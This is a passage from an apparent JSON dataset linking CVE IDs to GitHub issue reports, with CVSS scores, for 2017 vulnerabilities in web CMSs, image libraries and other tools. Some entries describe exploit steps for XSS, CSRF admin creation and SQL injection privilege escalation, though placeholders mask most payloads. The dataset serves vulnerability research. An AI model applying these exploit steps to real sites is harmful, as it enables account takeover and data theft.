  14278. "Issue_Url_old": "https://github.com/trollepierre/tdm/issues/50",
  14279. "Issue_Url_new": "https://github.com/trollepierre/tdm/issues/50",
  14280. "Repo_new": "trollepierre/tdm",
  14281. "Issue_Created_At": "2017-03-24T05:14:54Z",
  14282. "description": "A Reflected XSS vulnerability in FILETAG . Hello: I have found a Reflected XSS vulnerability. The vulnerability exists due to insufficient filtering of user supplied data in the \"challenge\" HTTP parameter that will be passed to \"tdm APITAG The affected source code is line NUMBERTAG there is no protection on $_GET FILETAG FILETAG So if an attacker constructs a special url as follows and sends it to a victim, when the victim clicks the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The following screenshot shows the result of clicking the above url ( win7 sp NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  14283. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  14284. "severity": "MEDIUM",
  14285. "baseScore": 6.1,
  14286. "impactScore": 2.7,
  14287. "exploitabilityScore": 2.8
  14288. },
  14289. {
  14290. "CVE_ID": "CVE-2017-7877",
  14291. "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/27",
  14292. "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/27",
  14293. "Repo_new": "flatcore/flatcore-cms",
  14294. "Issue_Created_At": "2017-04-08T04:40:49Z",
  14295. "description": "CSRF Privilege Escalation APITAG of an administrator account) on APITAG NUMBERTAG Exploit Title: CSRF Privilege Escalation APITAG of an administrator account) on APITAG NUMBERTAG Date NUMBERTAG April NUMBERTAG Exploit Author: MENTIONTAG Software Link: FILETAG Version NUMBERTAG Description: Using Cross Site Request Forgery (CSRF), an attacker can force a user who is currently authenticated with a web application to execute an unwanted action. The attacker can trick the user into loading a page which may send a request to perform the unwanted action in the background. In the case of APITAG we can use CSRF to perform actions on the admin dashboard by targeting an administrator. Exploit: We assume that APITAG is installed at APITAG . Our target is APITAG which is the page used to create a new user. The given POC will create a user on the website which has full administrator privileges. CODETAG Before running the POC, make sure you are logged in into an administrator account. Then open the HTML file and submit the form. The new user with admin rights should now have been created. References: URLTAG URLTAG Screenshots: Before the exploit FILETAG Exploit Page FILETAG After submitting the form FILETAG New user added FILETAG With admin access FILETAG Impact: Compromises the entire web application and user data Mitigation: Use of CSRF tokens Creation of a user account was just an example. Other pages/settings in the admin dashboard are also vulnerable to CSRF. For example, the APITAG Headers (HTML)_ features can be misused to inject JS into the website.",
  14296. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  14297. "severity": "HIGH",
  14298. "baseScore": 8.8,
  14299. "impactScore": 5.9,
  14300. "exploitabilityScore": 2.8
  14301. },
  14302. {
  14303. "CVE_ID": "CVE-2017-7878",
  14304. "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/29",
  14305. "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/29",
  14306. "Repo_new": "flatcore/flatcore-cms",
  14307. "Issue_Created_At": "2017-04-11T15:48:28Z",
  14308. "description": "SQL Injection vulnerability APITAG DB) on APITAG NUMBERTAG Exploit Title: SQL Injection vulnerability APITAG DB) on APITAG NUMBERTAG Date NUMBERTAG April NUMBERTAG Exploit Author: MENTIONTAG Software Link: FILETAG Version NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Exploit: The vulnerability is due to a non parameterized SQL query at URLTAG This vulnerability along with missing validation on the email field of the registration and password reset forms can be used to create an administrator account with full privileges. We assume that APITAG is installed at APITAG and new registrations are enabled NUMBERTAG Go to APITAG . Fill in the username ERRORTAG and some password. Fill in the email fields as ERRORTAG . This step is required since the password reset form checks for valid emails in the DB before reset NUMBERTAG Since the register page uses parameterized query, the whole email string will be stored in the DB NUMBERTAG Now go to APITAG and put in the email address mentioned while registering. Due to URLTAG the query will effectively become ERRORTAG NUMBERTAG As you can see, this will set administrator as the user class for now newly created user ERRORTAG and will also give it permissions to manage the user management screen NUMBERTAG Once inside the admin panel, the attacker can give himself extra privileges. References: URLTAG Screenshots: Registration Form FILETAG Password Reset FILETAG New user created and verified with ability to edit users FILETAG Logged in as new user and change privileges FILETAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation on email fields",
  14309. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  14310. "severity": "CRITICAL",
  14311. "baseScore": 9.8,
  14312. "impactScore": 5.9,
  14313. "exploitabilityScore": 3.9
  14314. },
  14315. {
  14316. "CVE_ID": "CVE-2017-7879",
  14317. "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/28",
  14318. "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/28",
  14319. "Repo_new": "flatcore/flatcore-cms",
  14320. "Issue_Created_At": "2017-04-11T07:17:33Z",
  14321. "description": "SQL Injection vulnerability APITAG DB) on APITAG NUMBERTAG Exploit Title: SQL Injection vulnerability APITAG DB) on APITAG NUMBERTAG Date NUMBERTAG April NUMBERTAG Exploit Author: MENTIONTAG Software Link: FILETAG Version NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Exploit: The vulnerability is due to a non parameterized SQL query at URLTAG and a few following lines. We assume that APITAG is installed at APITAG . The exploit URL is APITAG . This effectively results in the following query to be executed APITAG which allows an unauthenticated user to be able to view all ghost/invisible pages without having links to them. The exploit URL can also be possibly modified to leak the content database using UNION based SQL injection attacks. References: URLTAG Screenshots: Viewing ghost pages FILETAG Impact: Read data from the content database Mitigation: Use of Parameterized SQL Queries",
  14322. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  14323. "severity": "HIGH",
  14324. "baseScore": 7.5,
  14325. "impactScore": 3.6,
  14326. "exploitabilityScore": 3.9
  14327. },
  14328. {
  14329. "CVE_ID": "CVE-2017-7891",
  14330. "Issue_Url_old": "https://github.com/sbpp/sourcebans-pp/issues/253",
  14331. "Issue_Url_new": "https://github.com/sbpp/sourcebans-pp/issues/253",
  14332. "Repo_new": "sbpp/sourcebans-pp",
  14333. "Issue_Created_At": "2017-04-13T08:45:50Z",
  14334. "description": "XSS vulnerability in FILETAG . There is a reflective XSS vulnerability in the NUMBERTAG line of the FILETAG file. Hackers can exploit this vulnerability to obtain an administrator's cookies. URLTAG \"); APITAG APITAG APITAG APITAG alert(\"a Effect in browser: FILETAG FILETAG code: FILETAG Do not print the user input data directly on the page. Please. My English is so poor. Could you help me apply for a CVE number for this vulnerability? I need it. Thank you very much\u3002 Version used NUMBERTAG PHP and APITAG version: APITAG mysql5 Operating System and version: windows NUMBERTAG Link to your project:localhost",
  14335. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  14336. "severity": "MEDIUM",
  14337. "baseScore": 6.1,
  14338. "impactScore": 2.7,
  14339. "exploitabilityScore": 2.8
  14340. },
  14341. {
  14342. "CVE_ID": "CVE-2017-7939",
  14343. "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/13",
  14344. "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/13",
  14345. "Repo_new": "jsummers/imageworsener",
  14346. "Issue_Created_At": "2017-04-08T17:19:17Z",
  14347. "description": "stack buffer overflow in read_next_pam_token. on APITAG NUMBERTAG imagew $FILE FILETAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffd NUMBERTAG d NUMBERTAG a4 at pc NUMBERTAG c bp NUMBERTAG ffd NUMBERTAG d NUMBERTAG f NUMBERTAG sp NUMBERTAG ffd NUMBERTAG d NUMBERTAG f NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ffd NUMBERTAG d NUMBERTAG a4 thread T NUMBERTAG b in read_next_pam_token src/imagew APITAG NUMBERTAG a7c in iwpnm_read_pam_header src/imagew APITAG NUMBERTAG aa in iwpnm_read_header src/imagew APITAG NUMBERTAG e in iw_read_pnm_file src/imagew APITAG NUMBERTAG f in iw_read_pam_file src/imagew APITAG NUMBERTAG b2a6 in iw_read_file_by_fmt src/imagew APITAG NUMBERTAG in iwcmd_run src/imagew APITAG NUMBERTAG bfb in iwcmd_main src/imagew APITAG NUMBERTAG cde in main src/imagew APITAG NUMBERTAG fb NUMBERTAG f NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG PATHTAG ) Address NUMBERTAG ffd NUMBERTAG d NUMBERTAG a4 is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG a5 in iwpnm_read_pam_header src/imagew APITAG This frame has NUMBERTAG object(s NUMBERTAG curpos NUMBERTAG linebuf' APITAG NUMBERTAG ab NUMBERTAG f4 f4 f4 f2 f2 f2 f NUMBERTAG ab NUMBERTAG f4 f4 f4 f2 f2 f2 f NUMBERTAG ab NUMBERTAG f4 f4 f NUMBERTAG ab NUMBERTAG f3 f3 f3 f NUMBERTAG ab NUMBERTAG f1 f1 f1 f NUMBERTAG f4 f4 f4 f3 f3 f3 f NUMBERTAG ab NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING testcase: URLTAG",
  14348. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14349. "severity": "MEDIUM",
  14350. "baseScore": 5.5,
  14351. "impactScore": 3.6,
  14352. "exploitabilityScore": 1.8
  14353. },
  14354. {
  14355. "CVE_ID": "CVE-2017-7940",
  14356. "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/18",
  14357. "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/18",
  14358. "Repo_new": "jsummers/imageworsener",
  14359. "Issue_Created_At": "2017-04-17T14:50:49Z",
  14360. "description": "memory leak in imagew cmd. on APITAG NUMBERTAG imagew $FILE out.pnm APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f1ac NUMBERTAG dbb8 in __interceptor_malloc PATHTAG NUMBERTAG ERRORTAG b NUMBERTAG in my_mallocfn src/imagew APITAG NUMBERTAG a NUMBERTAG c in iw_malloc_ex src/imagew APITAG NUMBERTAG a8a7 in iw_malloc_large src/imagew APITAG NUMBERTAG f NUMBERTAG in iwgif_init_screen src/imagew APITAG NUMBERTAG d7 in iwgif_read_image src/imagew APITAG NUMBERTAG in iwgif_read_main src/imagew APITAG NUMBERTAG cde in iw_read_gif_file src/imagew APITAG NUMBERTAG b NUMBERTAG in iw_read_file_by_fmt src/imagew APITAG NUMBERTAG in iwcmd_run src/imagew APITAG NUMBERTAG bfb in iwcmd_main src/imagew APITAG NUMBERTAG cde in main src/imagew APITAG NUMBERTAG f1ac NUMBERTAG b NUMBERTAG in __libc_start_main APITAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: URLTAG",
  14361. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14362. "severity": "MEDIUM",
  14363. "baseScore": 5.5,
  14364. "impactScore": 3.6,
  14365. "exploitabilityScore": 1.8
  14366. },
  14367. {
  14368. "CVE_ID": "CVE-2017-7941",
  14369. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/428",
  14370. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/428",
  14371. "Repo_new": "imagemagick/imagemagick",
  14372. "Issue_Created_At": "2017-04-17T15:34:24Z",
  14373. "description": "memory leak in sgi. on APITAG latest version identify $FILE APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f6a NUMBERTAG a NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG ed NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG d8 in APITAG APITAG NUMBERTAG e4e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1a NUMBERTAG in APITAG APITAG NUMBERTAG bba NUMBERTAG in APITAG APITAG NUMBERTAG c NUMBERTAG fea in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f6a NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f6a NUMBERTAG a NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG ed NUMBERTAG in APITAG APITAG NUMBERTAG d1d7 in APITAG APITAG NUMBERTAG f NUMBERTAG d8 in APITAG APITAG NUMBERTAG e4e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1a NUMBERTAG in APITAG APITAG NUMBERTAG bba NUMBERTAG in APITAG APITAG NUMBERTAG c NUMBERTAG fea in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f6a NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f6a NUMBERTAG a NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG d8 in APITAG APITAG NUMBERTAG e4e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1a NUMBERTAG in APITAG APITAG NUMBERTAG bba NUMBERTAG in APITAG APITAG NUMBERTAG c NUMBERTAG fea in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa 
NUMBERTAG in main APITAG NUMBERTAG f6a NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f6a NUMBERTAG a NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG d8 in APITAG APITAG NUMBERTAG e4e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1a NUMBERTAG in APITAG APITAG NUMBERTAG bba NUMBERTAG in APITAG APITAG NUMBERTAG c NUMBERTAG fea in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f6a NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f6a NUMBERTAG a NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG ef NUMBERTAG in APITAG APITAG NUMBERTAG d1d7 in APITAG APITAG NUMBERTAG f NUMBERTAG d8 in APITAG APITAG NUMBERTAG e4e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1a NUMBERTAG in APITAG APITAG NUMBERTAG bba NUMBERTAG in APITAG APITAG NUMBERTAG c NUMBERTAG fea in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f6a NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f6a NUMBERTAG a NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG ef NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG d8 in APITAG APITAG NUMBERTAG e4e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1a NUMBERTAG in APITAG APITAG NUMBERTAG bba NUMBERTAG in APITAG APITAG NUMBERTAG c NUMBERTAG fea in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG 
NUMBERTAG f6a NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: URLTAG",
  14374. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14375. "severity": "MEDIUM",
  14376. "baseScore": 6.5,
  14377. "impactScore": 3.6,
  14378. "exploitabilityScore": 2.8
  14379. },
  14380. {
  14381. "CVE_ID": "CVE-2017-7942",
  14382. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/429",
  14383. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/429",
  14384. "Repo_new": "imagemagick/imagemagick",
  14385. "Issue_Created_At": "2017-04-17T15:34:50Z",
  14386. "description": "memory leak in avs. on APITAG latest version identify $FILE APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fc8c NUMBERTAG a NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG ed NUMBERTAG in APITAG APITAG NUMBERTAG e3c7 in APITAG APITAG NUMBERTAG f NUMBERTAG d8 in APITAG APITAG NUMBERTAG e4e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1a NUMBERTAG in APITAG APITAG NUMBERTAG bba NUMBERTAG in APITAG APITAG NUMBERTAG c NUMBERTAG fea in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fc8c1ab0b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fc8c NUMBERTAG a NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG ef NUMBERTAG in APITAG APITAG NUMBERTAG e3c7 in APITAG APITAG NUMBERTAG f NUMBERTAG d8 in APITAG APITAG NUMBERTAG e4e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1a NUMBERTAG in APITAG APITAG NUMBERTAG bba NUMBERTAG in APITAG APITAG NUMBERTAG c NUMBERTAG fea in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fc8c1ab0b NUMBERTAG in __libc_start_main APITAG testcase: FILETAG",
  14387. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14388. "severity": "MEDIUM",
  14389. "baseScore": 6.5,
  14390. "impactScore": 3.6,
  14391. "exploitabilityScore": 2.8
  14392. },
  14393. {
  14394. "CVE_ID": "CVE-2017-7943",
  14395. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/427",
  14396. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/427",
  14397. "Repo_new": "imagemagick/imagemagick",
  14398. "Issue_Created_At": "2017-04-17T15:33:26Z",
  14399. "description": "memory leak in svg. on APITAG latest version identify $FILE APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f6a NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG f9da in APITAG APITAG NUMBERTAG ae6ca in APITAG APITAG NUMBERTAG f NUMBERTAG d8 in APITAG APITAG NUMBERTAG e4e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1a NUMBERTAG in APITAG APITAG NUMBERTAG bba NUMBERTAG in APITAG APITAG NUMBERTAG c NUMBERTAG fea in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f6a NUMBERTAG b NUMBERTAG in __libc_start_main APITAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG",
  14400. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14401. "severity": "MEDIUM",
  14402. "baseScore": 6.5,
  14403. "impactScore": 3.6,
  14404. "exploitabilityScore": 2.8
  14405. },
  14406. {
  14407. "CVE_ID": "CVE-2017-7946",
  14408. "Issue_Url_old": "https://github.com/radare/radare2/issues/7301",
  14409. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/7301",
  14410. "Repo_new": "radareorg/radare2",
  14411. "Issue_Created_At": "2017-04-18T09:55:20Z",
  14412. "description": "Use after free in APITAG Use after free in APITAG Tested on Git HEAD: APITAG Payload: URLTAG Command: APITAG ASAN: ERRORTAG",
  14413. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14414. "severity": "MEDIUM",
  14415. "baseScore": 5.5,
  14416. "impactScore": 3.6,
  14417. "exploitabilityScore": 1.8
  14418. },
  14419. {
  14420. "CVE_ID": "CVE-2017-7962",
  14421. "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/15",
  14422. "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/15",
  14423. "Repo_new": "jsummers/imageworsener",
  14424. "Issue_Created_At": "2017-04-12T10:38:59Z",
  14425. "description": "divide by zero in iwgif_record_pixel (imagew gif.c). On NUMBERTAG ERRORTAG Reproducer: URLTAG",
  14426. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14427. "severity": "MEDIUM",
  14428. "baseScore": 5.5,
  14429. "impactScore": 3.6,
  14430. "exploitabilityScore": 1.8
  14431. },
  14432. {
  14433. "CVE_ID": "CVE-2017-7982",
  14434. "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/103",
  14435. "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/103",
  14436. "Repo_new": "libimobiledevice/libplist",
  14437. "Issue_Created_At": "2017-04-18T07:06:33Z",
  14438. "description": "heap buffer overflow in APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG c8 at pc NUMBERTAG b8 bp NUMBERTAG bfb NUMBERTAG b NUMBERTAG sp NUMBERTAG bfb NUMBERTAG b4c READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG c8 thread T NUMBERTAG b7 in parse_bin_node_at_index PATHTAG NUMBERTAG in plist_from_bin PATHTAG NUMBERTAG bbab in main PATHTAG NUMBERTAG b5fe6a NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG in _start ( PATHTAG NUMBERTAG b NUMBERTAG c8 is located NUMBERTAG bytes to the left of NUMBERTAG byte region FILETAG",
  14439. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14440. "severity": "MEDIUM",
  14441. "baseScore": 5.5,
  14442. "impactScore": 3.6,
  14443. "exploitabilityScore": 1.8
  14444. },
  14445. {
  14446. "CVE_ID": "CVE-2017-7992",
  14447. "Issue_Url_old": "https://github.com/hps/heartland-php/issues/28",
  14448. "Issue_Url_new": "https://github.com/hps/heartland-php/issues/28",
  14449. "Repo_new": "hps/heartland-php",
  14450. "Issue_Created_At": "2017-02-22T14:55:08Z",
  14451. "description": "A Reflected XSS vulnerability in this sdk. Hello: I found a Reflected XSS vulnerability in this sdk. The vulnerability exists due to directly output user supplied data in HTTP GET parameter, this happended in the file PATHTAG The infected source code is line NUMBERTAG there is no protection on $_GET; FILETAG if $_GET contains evil js code, line NUMBERTAG will trigger untrusted code to be excuted on the browser side. So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 sp NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech Email: EMAILTAG",
  14452. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  14453. "severity": "MEDIUM",
  14454. "baseScore": 6.1,
  14455. "impactScore": 2.7,
  14456. "exploitabilityScore": 2.8
  14457. },
  14458. {
  14459. "CVE_ID": "CVE-2017-8081",
  14460. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1224",
  14461. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1224",
  14462. "Repo_new": "getsimplecms/getsimplecms",
  14463. "Issue_Created_At": "2017-04-24T18:00:49Z",
  14464. "description": "CVE NUMBERTAG generate_salt unnecessarily weak. [ ] mt_rand weak [ ] sub str sha1 to NUMBERTAG characters ( why )? we allow custom salt and it has no problems being longer than NUMBERTAG chars so i have no idea where this restriction came from. Do not see any breakage from removing it. refs NUMBERTAG",
  14465. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  14466. "severity": "HIGH",
  14467. "baseScore": 8.8,
  14468. "impactScore": 5.9,
  14469. "exploitabilityScore": 2.8
  14470. },
  14471. {
  14472. "CVE_ID": "CVE-2017-8101",
  14473. "Issue_Url_old": "https://github.com/s9y/Serendipity/issues/452",
  14474. "Issue_Url_new": "https://github.com/s9y/serendipity/issues/452",
  14475. "Repo_new": "s9y/serendipity",
  14476. "Issue_Created_At": "2017-02-26T03:35:34Z",
  14477. "description": "Installation of theme is not secure with a CSRF token. version NUMBERTAG payload: URLTAG Use tag APITAG in another html to request this payload,after serendipity's admin visits it,theme will be changed.",
  14478. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  14479. "severity": "HIGH",
  14480. "baseScore": 8.8,
  14481. "impactScore": 5.9,
  14482. "exploitabilityScore": 2.8
  14483. },
  14484. {
  14485. "CVE_ID": "CVE-2017-8102",
  14486. "Issue_Url_old": "https://github.com/s9y/Serendipity/issues/456",
  14487. "Issue_Url_new": "https://github.com/s9y/serendipity/issues/456",
  14488. "Repo_new": "s9y/serendipity",
  14489. "Issue_Created_At": "2017-03-04T08:48:17Z",
  14490. "description": "stored XSS in NUMBERTAG rc NUMBERTAG create a standard editor named \"test\", APITAG NUMBERTAG write a new entry ERRORTAG APITAG NUMBERTAG then post this entry,when admin view it ,XSS occur! APITAG",
  14491. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  14492. "severity": "MEDIUM",
  14493. "baseScore": 5.4,
  14494. "impactScore": 2.7,
  14495. "exploitabilityScore": 2.3
  14496. },
  14497. {
  14498. "CVE_ID": "CVE-2017-8109",
  14499. "Issue_Url_old": "https://github.com/saltstack/salt/issues/40075",
  14500. "Issue_Url_new": "https://github.com/saltstack/salt/issues/40075",
  14501. "Repo_new": "saltstack/salt",
  14502. "Issue_Created_At": "2017-03-16T11:11:12Z",
  14503. "description": "salt ssh temporary files insecure permissions. When salt ssh sets up it's temporary location (eg. APITAG ), the files contained (eg. ERRORTAG ) are NUMBERTAG Some of these files may well contain sensitive data such as private keys (which when installed will be set to NUMBERTAG by the state). The permissions may be inherited from the salt master, but if these files come from a backend such as gitfs, they seem to have NUMBERTAG in the master gitfs cache (which in itself is a problem!) Run the following state with APITAG and check the files located in the temporary directory on the remote host. The APITAG file will be CODETAG Salt Version: Salt: APITAG Dependency Versions: cffi NUMBERTAG cherrypy NUMBERTAG dateutil: Not Installed gitdb: Not Installed gitpython: Not Installed ioflo: Not Installed Jinja NUMBERTAG libgit NUMBERTAG libnacl: Not Installed APITAG NUMBERTAG Mako: Not Installed msgpack pure: Not Installed msgpack python NUMBERTAG mysql python: Not Installed pycparser NUMBERTAG pycrypto NUMBERTAG pygit NUMBERTAG Python NUMBERTAG default, No NUMBERTAG python gnupg: Not Installed APITAG NUMBERTAG APITAG NUMBERTAG RAET: Not Installed smmap: Not Installed timelib: Not Installed Tornado NUMBERTAG ZMQ NUMBERTAG System Versions: dist: centos NUMBERTAG Core machine NUMBERTAG release NUMBERTAG APITAG system: Linux version: APITAG Linu NUMBERTAG Core `",
  14504. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  14505. "severity": "HIGH",
  14506. "baseScore": 7.8,
  14507. "impactScore": 5.9,
  14508. "exploitabilityScore": 1.8
  14509. },
  14510. {
